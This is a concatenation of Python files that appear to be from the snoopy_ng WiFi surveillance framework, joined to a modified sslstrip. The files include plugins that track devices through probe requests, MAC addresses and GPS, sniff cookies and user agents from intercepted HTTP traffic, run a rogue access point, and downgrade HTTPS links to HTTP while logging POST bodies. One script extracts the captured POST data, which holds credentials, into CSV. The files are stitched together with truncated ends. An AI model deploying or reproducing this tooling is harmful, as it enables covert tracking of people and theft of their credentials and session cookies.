#    sess  = metadata.tables['sessions'] 
    cookies = metadata.tables['cookies']
    leases = metadata.tables['dhcp_leases']
    sslstrip = metadata.tables['sslstrip']
    wpa = metadata.tables['wpa_handshakes']
    gps = metadata.tables['gpsd']

#    mtk = metadata.tables['mtk']
#    users = metadata.tables['users']

except Exception, e:
    logging.warning("WARNING: Unable to query at least one table from supplied db (%s)" % dbms)
    logging.warning("Error was %s" %str(e))
    #exit(-1)

#filters = []
s = select([proxs], and_(*filters))
#filters.append(proxs.c.num_probes>1)

#logging.debug(filters)

if proxs is not None:
    filters.append(proxs.c.run_id == sess.c.runn_id)

if start_time is not None:
    filters.append(proxs.c.first_obs >= st_obj)

if end_time is not None:
    filters.append(proxs.c.last_obs <= et_obj)

if drone is not None:
    filters.append(sess.c.drone == drone)

if location is not None:
    filters.append(sess.c.location == location)

if mac:# is not None:
    filters.append(proxs.c.mac == mac)

if ssid is not None:
    filters.append(ssids.c.ssid == ssid)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import collections
import logging
import re
from sqlalchemy import MetaData, Table, Column, String, Integer, DateTime
from includes.common import snoop_hash, printFreq
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import Dot11ProbeReq, Dot11Elt
import datetime
from includes.fonts import *
import os
from includes.prox import prox
from includes.mac_vendor import mac_vendor
from includes.fifoDict import fifoDict

class Snarf():
    """Observe WiFi client devices based on probe-requests emitted."""

    def __init__(self, **kwargs):

        self.proxWindow = kwargs.get('proxWindow', 300)
        self.hash_macs = kwargs.get('hash_macs', False)
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]
        self.prox = prox(proxWindow=self.proxWindow, identName="mac", pulseName="num_probes", verb=0, callerName=self.fname)
        self.device_vendor = fifoDict(names=("mac", "vendor", "vendorLong"))
        self.client_ssids = fifoDict(names=("mac","ssid"))

        self.mv = mac_vendor()    
        self.lastPrintUpdate = 0

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('wifi_client_obs', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('first_obs', DateTime, primary_key=True, autoincrement=False),
                      Column('last_obs', DateTime),
                      Column('num_probes', Integer),
                      Column('sunc', Integer, default=0),
                    )

        table2 = Table('vendors', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('vendor', String(20) ),
                      Column('vendorLong', String(50) ),
                      Column('sunc', Integer, default=0))

        table3 = Table('wifi_client_ssids', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('ssid', String(100), primary_key=True, autoincrement=False),
                      Column('sunc', Integer, default=0))

        return [table, table2, table3]

    def proc_packet(self,p):
        
        if not p.haslayer(Dot11ProbeReq):
            return
        timeStamp = datetime.datetime.fromtimestamp(int(p.time))
        mac = re.sub(':', '', p.addr2)
        vendor = self.mv.lookup(mac[:6])

        if self.hash_macs == "True":
            mac = snoop_hash(mac)

        try:
            sig_str = -(256-ord(p.notdecoded[-4:-3])) #TODO: Use signal strength
        except:
            #logging.error("Unable to extract signal strength")
            pass 
        self.prox.pulse(mac, timeStamp) #Using packet time instead of system time allows us to read pcaps
        self.device_vendor.add((mac,vendor[0],vendor[1]))

        if p[Dot11Elt].info != '':
            ssid = p[Dot11Elt].info.decode('utf-8')
            ssid = re.sub("\n", "", ssid)
            if self.verb > 1 and len(ssid) > 0:
                logging.info("Sub-plugin %s%s%s noted device %s%s%s (%s%s%s) probing for %s%s%s" % (GR,self.fname,G,GR,mac,G,GR,vendor[0],G,GR,ssid,G))
            if len(ssid) > 0:
                self.client_ssids.add((mac,ssid))

    def get_data(self):
        """Ensure data is returned in the form (tableName,[colname:data,colname:data]) """
        proxSess =  self.prox.getProxs()
        vendors = self.device_vendor.getNew()
        ssid_list = self.client_ssids.getNew()

        if proxSess and self.verb > 0 and abs(os.times()[4] - self.lastPrintUpdate) > printFreq:
            logging.info("Sub-plugin %s%s%s currently observing %s%d%s client devices" % (GR,self.fname,G,GR,self.prox.getNumProxs(),G))
            self.lastPrintUpdate = os.times()[4]

        data = [("wifi_client_obs",proxSess), ("vendors",vendors), ("wifi_client_ssids", ssid_list)]
        return data




#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
import re
from sqlalchemy import MetaData, Table, Column, Integer, String, Unicode
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import Dot11ProbeReq, Dot11Elt, TCP, IP, Raw, Ether, RadioTap
from base64 import b64encode
from includes.common import snoop_hash
from collections import OrderedDict
import time
import datetime
from publicsuffix import PublicSuffixList
from urlparse import urlparse
import includes.firelamb_helper as helper
from includes.fonts import *
import os
from includes.fifoDict import fifoDict

MAX_NUM_SSIDs = 1000 #Maximum number of mac:ssid pairs to keep in memory

class Snarf():
    """Extract web cookies"""

    def __init__(self, **kwargs):
        self.drone = kwargs.get('drone',"no_drone_name_supplied")
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(os.path.basename(__file__)))[0]
        self.psl = PublicSuffixList()

        self.cookies = fifoDict(names=("drone", "client_mac", "client_ip", "host", "name", "value", "baseDomain", "address", "lastAccessed", "creationTime"))
        self.userAgents = fifoDict(names=("mac","userAgent"))

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('cookies', MetaData(),
                        Column('drone', String(20),primary_key=True),
                        Column('client_mac', String(15),primary_key=True),
                        Column('client_ip', String(16),primary_key=True),
                        #Following columns are as defined by Firefox
                        Column('baseDomain', String(100), primary_key=True, autoincrement=False),
                        Column('name', String(100), primary_key=True, autoincrement=False),
                        Column('value', String(100)),
                        Column('host', String(100)),
                        Column('path', String(100), default="/"),
                        Column('expiry', Integer, default=2000000000), #Year 2030
                        Column('lastAccessed', Integer),
                        Column('creationTime', Integer),
                        Column('isSecure', Integer, default=0),
                        Column('isHttpOnly', Integer, default=0),
                        Column('sunc', Integer, default=0))

        table2 = Table('user_agents', MetaData(),
                        Column('mac', String(64), primary_key=True), #Len 64 for sha256
                        Column('userAgent', String(128), primary_key=True, autoincrement=False)) #One device may have multiple browsers

        return [table, table2]

    def proc_packet(self, pkt):
        if pkt.haslayer(TCP) and pkt.haslayer(IP):
            if pkt.haslayer(Raw):
                tcpdata = pkt.getlayer(Raw).load
                if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
                    if pkt.getlayer(RadioTap):
                        ether_src = pkt.addr2
                    if pkt.getlayer(Ether):
                        ether_src=pkt.getlayer(Ether).src
                    ether_src = re.sub(':', '', ether_src)
                    pTime = datetime.datetime.fromtimestamp(int(pkt.time))

                    cookie=helper.getcookie(tcpdata)
                    host=helper.gethost(tcpdata)
                    useragent=helper.getuseragent(tcpdata)
                    address=helper.getdsturl(tcpdata)
                    ip_src=pkt.getlayer(IP).src

                    if cookie != None:
                        cookie=''.join(cookie)
                        cookie = cookie.decode('utf-8', 'ignore')
                    else:
                        cookie=''
                    if host != None:
                        host=''.join(host)
                    else:
                        host=''
                    if useragent != None:
                        useragent=''.join(useragent)
                        useragent = useragent.decode('utf-8', 'ignore')
                        self.userAgents.add((ether_src,useragent)) 
                    else:
                        useragent=''

                    if address != None:
                        address=''.join(address)
                    else:
                        address=''

                    if cookie != '':
                        cookies = cookie.split(';')
                        for name_val in cookies:
                            eq = name_val.find('=')
                            name = name_val[0:eq].strip()
                            val = name_val[eq+1:].strip()
                            self.cookies.add((self.drone,ether_src,ip_src,host,name,val,address,address,pTime,pTime))
                            if self.verb > 0:
                                logging.info("Sub-plugin %s%s%s observed cookie for domain %s%s (%s)%s" % (GR,self.fname,G,GR,host,ether_src,G))

    def get_data(self):

        #Grab useragent and cookies:
        uaList = self.userAgents.getNew()
        cookieList = self.cookies.getNew()

        return [("cookies", cookieList), ("user_agents", uaList)]



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
from sqlalchemy import Float, DateTime, String, Integer, Table, MetaData, Column #As required
from threading import Thread
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')
import time
from collections import deque
from random import randint
import datetime
from threading import Thread
import datetime
import json
import os

fname = os.path.splitext(os.path.basename(__file__))[0]

class Snoop(Thread):
    """This plugin always runs, but the user is not notified about it."""
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True
        # Process arguments passed to module
        self.drone = kwargs.get('drone',"no_drone_name_supplied")
        self.run_id = kwargs.get('run_id', "no_run_id_supplied")
        self.location = kwargs.get('location', "no_location_supplied")
        plugs = kwargs.get('plugs')
        now = datetime.datetime.now() #.strftime("%Y-%m-%d %H:%M:%S")

        tmp_p = []
        for p in json.loads(plugs):
            name = p['name'][8:]
            if name != fname:
               tmp_p.append(name)
        plugins = ",".join(tmp_p)

        """
        plugs = json.loads(plugs)
        dd=[]
        for p in plugs:
            name = p['name'][8:]
            pas=[]
            for k,v in p['params'].iteritems():
                pas.append("%s=%s" % (k,v))
            fl = ",".join(pas)
            rtn = ""
            if fl:
                rtn = name + ":" + ",".join(pas)
            else:
                rtn = name
            if name != "run_log":
                dd.append(rtn)
        plugins = ",".join(dd)
        """

        self.run_session = {"runn_id" : self.run_id, "drone" : self.drone, "location" : self.location, "start" : now, "end" : now, 'plugins':plugins, 'sunc':0 }


    def run(self):
        while self.RUN:
            time.sleep(1)

    def is_ready(self):
        return True

    def stop(self):
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Creates a 'session' identifier, noting the start and end time of running the program.",
                "parameter_list" : None
                }
        return info

    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        self.run_session['end'] = datetime.datetime.now() #.strftime("%Y-%m-%d %H:%M:%S")
        return [("sessions", [self.run_session])]

    @staticmethod
    def get_tables():
        """This function should return a list of table(s)"""
        run = Table('sessions', MetaData(),
                    Column('runn_id', Integer, primary_key=True),
                    Column('location', String(length=60)),
                    Column('drone', String(length=200)),
                    Column('start', DateTime),
                    Column('end', DateTime),
                    Column('plugins', String(length=200)),
                    Column('sunc', Integer, default=0)
                    )

        return [run]

if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TODO: Change this since updating database format

import sys
import logging
from sqlalchemy import Float, DateTime, String, Integer, Table, MetaData, Column #As required
from threading import Thread
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')
import time
from collections import deque
from random import randint
import datetime
from threading import Thread
import collections
import csv
import re
import os
from includes.fonts import *

class Snoop(Thread):
    """Import from old Snoopy format. Only handles probe_data.txt file for now."""
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True

        self.DELTA_PROX = 300
        self.proximity_sessions = {}
        self.device_ssids = {}

        # Process arguments passed to module
        self.probes = kwargs.get('probes_file',"probe_data.txt")
        self.done_reading = False
        self.done_line = False

        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]

    def run(self):

        logging.info("Plugin %s%s%s processing '%s%s%s' file for data. This may take some time..." % (GR,self.fname,G,GR,self.probes,G))
        with open(self.probes) as f:
            for line in f:
                self.done_line = False
                try:
                    self.proc_line(line)
                except Exception, e:
                    logging.error("Encountered bad line, ignoring. Error was \"%s\". Bad line was:\n\t%s" %(e,line))
                    pass
        self.done_reading = True

    def proc_line(self,line):
        # Following 10 lines borrowed from old Snoopy
        line=line.rstrip()
        # e.g "N900-glenn","1344619634_27185","lough001","00:c0:1b:0b:54:89","tubes","-87","Aug 10, 2012 18:29:58.779969000"
        c=csv.reader([line],delimiter=",")
        r=next(iter(c), None)
        r[6]=re.sub('\..*','',r[6])
        r[3]=re.sub(':','',r[3]) #Remove colons from mac
        try:
            r[6]=time.mktime(time.strptime(r[6],"%b %d, %Y %H:%M:%S"))  #Until we can update N900's tshark to use frame.time_epoch
        except Exception,e:
            pass
        
        drone, location, mac, ssid, timestamp = r[0], r[2], r[3], r[4], r[6]
        if len(r) != 7:
            #logging.error("Encountered bad line, ignoring:\n\t%s" % line)
            return
        timestamp = datetime.datetime.fromtimestamp(timestamp)
        #1. First, do proximity_sessions        
        #Key is (drone,location,mac), revealing a list of proximity sessions
        if (drone,location,mac) not in self.proximity_sessions:        
            nps = (timestamp, timestamp, 1)
            self.proximity_sessions[(drone,location,mac)] = [nps]
        else:
            #Get last prox session in list
            cps = self.proximity_sessions[(drone,location,mac)][-1]
            first_obs, last_obs, num_probes = cps
            time_diff = timestamp - last_obs
            if time_diff >= datetime.timedelta(seconds=self.DELTA_PROX):
                #Expired. Create a  new one.
                self.proximity_sessions[(drone,location,mac)].append((timestamp, timestamp, 1))
            else:
                #Just update the old one
                self.proximity_sessions[(drone,location,mac)][-1] = (first_obs, timestamp, num_probes+1)

        #2. Second, do SSIDs
        self.device_ssids[(mac, ssid)] = 0

        self.done_line = True

    def get_data(self):
        if self.done_reading and self.done_line:
            #1. Prepare prox sessions
            proxs = []
            for k,v in self.proximity_sessions.iteritems():
                drone, location, mac = k
                for session in v:
                    first_obs, last_obs, num_probes = session
                    proxs.append({'drone':drone, 'location':location, 'mac':mac, 'first_obs':first_obs, 'last_obs':last_obs, 'num_probes':num_probes})

            self.proximity_sessions = {}
            self.done_reading = False #To make it not keep giving the same data over and over
            logging.info("Done processing '%s%s%s' for data. I won't read it again. This plugin is done." % (GR,self.probes,G))

            #2. Prepare ssids
            ssids = []
            for k,v in self.device_ssids.iteritems():
                mac,ssid = k
                ssids.append( {"mac": mac, "ssid": ssid} )            

            return [('proximity_sessions', proxs), ('ssids', ssids)]
            
        else:
            return []

    def is_ready(self):
        return True

    def stop(self):
        self.RUN = False

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Import data from old Snoopy.",
                "parameter_list" : [ ("probes_file=<probe_data.txt>","Path to probe_data.txt file."),
                                   ]
                }
        return info

    @staticmethod
    def get_tables():
        """Make sure to define your table here"""
        table = Table('proximity_sessions', MetaData(),
                      Column('mac', String(64), primary_key=True), #Len 64 for sha256
                      Column('first_obs', DateTime, primary_key=True, autoincrement=False),
                      Column('last_obs', DateTime),
                      Column('num_probes', Integer),
                      Column('sunc', Integer, default=0),
                      #Column('location', String(length=60)),
                      #Column('drone', String(length=20), primary_key=True))

        return [table]

if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)

    #Custom query per transform, but apply filter with and_(*filters) from transformCommon.
    #s = select([proxs.c.location, proxs.c.drone, proxs.c.first_obs, proxs.c.last_obs], and_(*filters))

    #ft = [ (gps.c.run_id == sess.c.run_id), (gps.c.systemTime >= sess.c.start), (gps.c.systemTime <= sess.c.end ) ]

    s = select([sess.c.location, sess.c.drone, proxs.c.first_obs, proxs.c.last_obs], and_(*filters))
    r = db.execute(s)
    results = r.fetchall()

    for r in results:
        location = r[0]
        drone = r[1]
        start_time = r[2].strftime("%Y-%m-%d %H:%M:%S.%f")
        end_time = r[3].strftime("%Y-%m-%d %H:%M:%S.%f")

        # Get GPS positions during the observation period of this session
        ft = [ (gps.c.run_id == sess.c.run_id), (gps.c.systemTime >= start_time), (gps.c.systemTime <= end_time ) ]
        sg = select([gps.c.lat, gps.c.lon], and_(*ft))
        gps_c = db.execute(sg).fetchall()

        if gps_c:
            firstGPS,lastGPS = (gps_c[0][0], gps_c[0][1]), (gps_c[-1][0], gps_c[-1][1])
            latVariance = abs(sorted(gps_c)[0][0]-sorted(gps_c)[-1][0])
            lonVariance = abs(sorted(gps_c)[0][1]-sorted(gps_c)[-1][1])
            logging.debug(firstGPS)
            logging.debug(type(firstGPS))


        td = (r[3] - r[2]).seconds
        if td == 0:
            td = 1
        hours, remainder = divmod(td, 3600)
        minutes, seconds = divmod(remainder, 60)
        duration = ""
        if hours > 0:
            duration += "%s hour" % hours
            if hours > 1:
                duration +='s'
        if minutes > 0:
            if duration != "":
                duration += ", "
            duration += "%s min" % minutes
            if minutes > 1:
                duration +='s'
        if seconds > 0:
            if duration != "":
                duration += ", "
            duration += "%s sec" % seconds
            if seconds > 1:
                duration +='s'
        observation = "Drone: %s\nLocation: %s\n(%s)" % (drone,location,duration)

        NewEnt=TRX.addEntity("snoopy.Observation", observation )
        #NewEnt=TRX.addEntity("snoopy.DroneLocation", location)
        NewEnt.addAdditionalFields("location","location", "strict", location)
        NewEnt.addAdditionalFields("drone","drone", "strict", drone)
        NewEnt.addAdditionalFields("start_time", "start_time", "strict", start_time)
        NewEnt.addAdditionalFields("end_time", "end_time", "strict", end_time)
        if gps_c:
            NewEnt.addAdditionalFields("start_gps", "start_gps", "strict", str(firstGPS))
            NewEnt.addAdditionalFields("end_gps", "end_gps", "strict", str(lastGPS))
            NewEnt.addAdditionalFields("var_gps", "var_gps", "strict", str(latVariance+lonVariance))


    TRX.returnOutput()

main()



# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging, re, string, random, zlib, gzip, StringIO

from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor

class ServerConnection(HTTPClient):

    ''' The server connection is where we do the bulk of the stripping.  Everything that
    comes back is examined.  The headers we dont like are removed, and the links are stripped
    from HTTPS to HTTP.
    '''

    urlExpression     = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    urlType           = re.compile(r"https://", re.IGNORECASE)
    urlExplicitPort   = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/',  re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        self.command          = command
        self.uri              = uri
        self.postData         = postData
        self.headers          = headers
        self.client           = client
        self.urlMonitor       = URLMonitor.getInstance()
        self.isImageRequest   = False
        self.isCompressed     = False
        self.contentLength    = None
        self.shutdownComplete = False
	print self.client

    def getLogLevel(self):
        return logging.DEBUG

    def getPostPrefix(self):
        return "POST"

    def sendRequest(self):
        logging.log(self.getLogLevel(), "Client:%s Sending Request: %s %s"  % (self.client.getClientIP(), self.command, self.uri))
        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        for header, value in self.headers.items():
            logging.log(self.getLogLevel(), "Client:%s Sending header: %s : %s" % (self.client.getClientIP(), header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
	# junaid change
        logging.warning("Client:" + self.client.getClientIP() + " " + self.getPostPrefix() + " Data (" + self.headers['host'] + ") URL(" + self.uri + ")URL:\n" + str(self.postData))
        self.transport.write(self.postData)

    def connectionMade(self):
        logging.log(self.getLogLevel(), "Client:%s HTTP connection made."  % (self.client.getClientIP()))
        self.sendRequest()
        self.sendHeaders()
        
        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):
        logging.log(self.getLogLevel(), "Client:%s Got server response: %s %s %s" % (self.client.getClientIP(), version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        logging.log(self.getLogLevel(), "Client:%s Got server header: %s:%s" % (self.client.getClientIP(), key, value))

        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                logging.debug("Client:%s Response is image content, not scanning..."  % (self.client.getClientIP()))

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                logging.debug("Client:%s Response is compressed..."  % (self.client.getClientIP()))
                self.isCompressed = True
        elif (key.lower() == 'content-length'):
            self.contentLength = value
        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)
        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
       if (self.isImageRequest and self.contentLength != None):
           self.client.setHeader("Content-Length", self.contentLength)

       if self.length == 0:
           self.shutdown()
                        
    def handleResponsePart(self, data):
        if (self.isImageRequest):
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        if (self.isImageRequest):
            self.shutdown()
        else:
            HTTPClient.handleResponseEnd(self)

    def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Client:%s Decompressing content..."  % (self.client.getClientIP()))
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
            
        logging.log(self.getLogLevel(), "Client:" + self.client.getClientIP() + " Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))
        
        self.client.write(data)
        self.shutdown()

    def replaceSecureLinks(self, data):
        iterator = re.finditer(ServerConnection.urlExpression, data)

        for match in iterator:
            url = match.group()

            logging.debug("Client:" + self.client.getClientIP() + " Found secure reference: " + url)

            url = url.replace('https://', 'http://', 1)
            url = url.replace('&amp;', '&')
            self.urlMonitor.addSecureLink(self.client.getClientIP(), url)

        data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
        return re.sub(ServerConnection.urlType, 'http://', data)

    def shutdown(self):
        if not self.shutdownComplete:
            self.shutdownComplete = True
            self.client.finish()
            self.transport.loseConnection()






class DnsCache:    

    '''
    The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
    '''

    _instance          = None

    def __init__(self):
        self.cache = {}

    def cacheResolution(self, host, address):
        self.cache[host] = address

    def getCachedAddress(self, host):
        if host in self.cache:
            return self.cache[host]

        return None

    def getInstance():
        if DnsCache._instance == None:
            DnsCache._instance = DnsCache()

        return DnsCache._instance

    getInstance = staticmethod(getInstance)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import logging
from sqlalchemy import Float, DateTime, String, Integer, Table, MetaData, Column #As required
from threading import Thread
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s %(levelname)s %(filename)s: %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S')
import time
from collections import deque
from random import randint
import datetime
from threading import Thread
import os
from includes.fonts import *
from includes.rogee import *

class Snoop(Thread):
    """Rogue Access Point."""
    def __init__(self, **kwargs):
        Thread.__init__(self)
        self.RUN = True

        # Process arguments passed to module
        self.verb = kwargs.get('verbose', 0)
        self.fname = os.path.splitext(os.path.basename(__file__))[0]
        self.myRogue = rogueAP(**kwargs)

    def run(self):
        self.myRogue.run_ap()
        self.myRogue.run_dhcpd()
        self.myRogue.do_nat()

        time.sleep(2)
        if not self.myRogue.all_OK():
            logging.error("Something's gone wrong with the Rogue AP. Probably try restarting things.")

        while self.RUN:
            time.sleep(2)

    def is_ready(self):
        #Perform any functions that must complete before plugin runs
        if not self.myRogue.all_OK():
            return False
        return True

    def stop(self):
        self.RUN = False
        self.myRogue.shutdown()

    @staticmethod
    def get_parameter_list():
        info = {"info" : "Create a rogue access point.",
                "parameter_list" : [ ("ssid=<name>","The SSID of the acces point."),
                                     ("promis=[True|False]","Set promiscuous mode (respond to all probe requests)."),
                                     ("run_dhcp=[True|False]","Run a DHCP server."),
                                     ("local_nat=[True|False]","Run local NAT to route traffic out."),
                                     ("hostapd=[True|False]","Use hostapd instead of airbase-ng."),
                                     ("hapdconf=<path>","Specify the hostapd config file to use."),
                                     ("hapdcmd=<path>","Specify the hostapd binary to use."),
                                     ("sslstrip=[True|False]","Send traffic through Moxie's SSL strip.")
                                    ]
                }
        return info


    def get_data(self):
        """Ensure data is returned in the form of a SQL row."""
        data = self.myRogue.get_new_leases() + self.myRogue.get_ssl_data()
        return data

    @staticmethod
    def get_tables():
        """This function should return a list of table(s)"""

        table = Table('dhcp_leases',MetaData(),
                              Column('leasetime', Integer),
                              Column('mac', String(12), primary_key=True),
                              Column('ip', String(length=20), primary_key=True, autoincrement=False),
                              Column('hostname', String(length=20)),
                              Column('sunc', Integer, default=0))   #Omit this if you don't want to sync

        ssl_strip = Table('sslstrip', MetaData(),
                            Column('date', DateTime),
                            Column('domain', String(60)),
                            Column('key', String(40)),
                            Column('value', String(200)),
                            Column('url', String(255)),
                            Column('client', String(15)),
                            Column('sunc', Integer, default=0))

        return [table, ssl_strip]

if __name__ == "__main__":
    Snoop().start()



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_, func
from transformCommon import *
from base64 import b64decode
from xml.sax.saxutils import escape
import re
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():

    illegal_xml_re = re.compile(u'[\x00-\x08\x0b-\x1f\x7f-\x84\x86-\x9f\ud800-\udfff\ufdd0-\ufddf\ufffe-\uffff]')

    filters = []
    filters.append(sess.c.location == location)
    filters.append(sess.c.run_id == vends.c.run_id)
    #filters.append(ssids.c.ssid == wigle.c.ssid)
    s = select([vends.c.vendor,vends.c.vendorLong, func.count(vends.c.vendor)], and_(*filters)).group_by(vends.c.vendor)

    r = db.execute(s)
    results = r.fetchall() 

    for res in results:
        vendor, vendorLong, count = res
        if count > 2:
            vendor = illegal_xml_re.sub('', vendor)
            NewEnt=TRX.addEntity("snoopy.Client", vendor)
            NewEnt.addAdditionalFields("vendor", "vendor", "strict", vendor)
            NewEnt.addAdditionalFields("vendorLong", "vendorLong", "strict", vendorLong)
            NewEnt.addAdditionalFields("count", "count", "strict", str(count))
            NewEnt.setWeight(count)

    TRX.returnOutput()

main()



#!/usr/bin/env python
# ----------------------------------------------
# Junaid Loonat (junaid@sensepost.com)
# JStripper - Parser for modified SSLStrip logs
# ----------------------------------------------
# How to import a CSV into a MySQL database:
#	http://www.tech-recipes.com/rx/2345/import_csv_file_directly_into_mysql/
# ----------------------------------------------

import os
import sys
import time
import base64
import urllib
import csv
import re

def usage():
	print 'Usage: jstripper.py file'

def processEntry(entry):
	print 'processEntry %s' % entry
	exportFile.writerow([
		entry['timestamp'],
		entry['src_ip'],
		entry['domain'],
		entry['url'],
		entry['secure'],
		entry['post']
	])

if __name__ == '__main__':
	if len(sys.argv) != 2:
		usage()
		sys.exit()
	logFilePath = sys.argv[1]
	if not os.path.exists(logFilePath):
		print 'Specified log file does not exist: %s' % logFilePath
	elif not os.path.isfile(logFilePath):
		print 'Specified log file does not appear to be a file: %s' % logFilePath
	else:
		exportFilePath = '%s%s' % (logFilePath, '.export')
		print 'Export file will be: %s' % exportFilePath
		if os.path.exists(exportFilePath):
			print 'Removing existing export file: %s' % exportFilePath
			os.remove(exportFilePath)
		exportFile = csv.writer(open(exportFilePath, 'wb'), delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
		exportFile.writerow(['timestamp', 'src_ip', 'domain', 'url', 'secure', 'post'])

		logFile = open(logFilePath, 'r')
		isEntry = False
		anEntry = {}
		for aLine in logFile:
			if aLine.startswith('2012-') and aLine.find(' Client:') > -1:
				if isEntry:
					processEntry(anEntry)
					isEntry = False
				
				if aLine.find(' POST Data (') > -1:
					isEntry = True
					anEntry = {}
					anEntry['timestamp'] = aLine[:aLine.find(',')]
					anEntry['secure'] = 0
					anEntry['post'] = ''
					if aLine.find('SECURE POST Data (') > -1:
						anEntry['secure'] = 1
						
					tStart = aLine.find(' POST Data (') + 12
					anEntry['domain'] = aLine[tStart:aLine.find(')', tStart)]
					
					tStart = aLine.find(' Client:') + 8
					anEntry['src_ip'] = aLine[tStart:aLine.find(' ', tStart)]
					
					tStart = aLine.find(' URL(') + 8
					anEntry['url'] = aLine[tStart:aLine.find(')URL', tStart)]
					
			elif isEntry:
				anEntry['post'] = '%s%s' % (anEntry['post'], urllib.unquote_plus(aLine.strip()))
				
		if isEntry:
			processEntry(anEntry)
			
		
		logFile.close()
	
		
		
		
		print 'done'



#!/usr/bin/python
# -*- coding: utf-8 -*-
# glenn@sensepost.com_
# snoopy_ng // 2013
# By using this code you agree to abide by the supplied LICENSE.txt

import sys
import os
from MaltegoTransform import *
import logging
from datetime import datetime
from sqlalchemy import create_engine, MetaData, select, and_
from transformCommon import *
logging.basicConfig(level=logging.DEBUG,filename='/tmp/maltego_logs.txt',format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S')

def main():
#    print "Content-type: xml\n\n";
#    MaltegoXML_in = sys.stdin.read()
#    logging.debug(MaltegoXML_in)
#    if MaltegoXML_in <> '':
#     m = MaltegoMsg(MaltegoXML_in)


    # Get GPS positions during this session
    ft = [ (gps.c.run_id == sess.c.run_id), (gps.c.systemTime >= sess.c.start), (gps.c.systemTime <= sess.c.end ) ]
    sg = select([gps.c.lat, gps.c.lon], and_(*ft))
    gps_c = db.execute(sg).fetchall()

    if gps_c:
